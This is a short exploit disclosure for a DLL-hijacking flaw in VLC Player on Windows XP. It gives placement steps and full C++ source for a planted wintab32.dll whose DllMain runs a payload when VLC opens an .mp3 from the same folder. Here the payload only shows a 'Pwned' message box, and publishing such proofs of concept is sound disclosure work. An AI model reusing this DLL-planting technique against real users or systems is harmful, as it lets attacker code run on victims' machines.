Exploit Title: VLC Player DLL Hijack Vulnerability Date: 25 Aug 2010 Author: Secfence Version: VLC Tested on: Windows XP Place a .mp3 file and wintab32.dll in same folder and execute .mp3 file in vlc player. Code for wintab32.dll: /*----------*/ /* wintab32.cpp */ #include "stdafx.h" #include "dragon.h" void init() { MessageBox(NULL,"Pwned", "Pwned!",0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } /*----------*/ Exploit By: Vinay Katoch www.secfence.com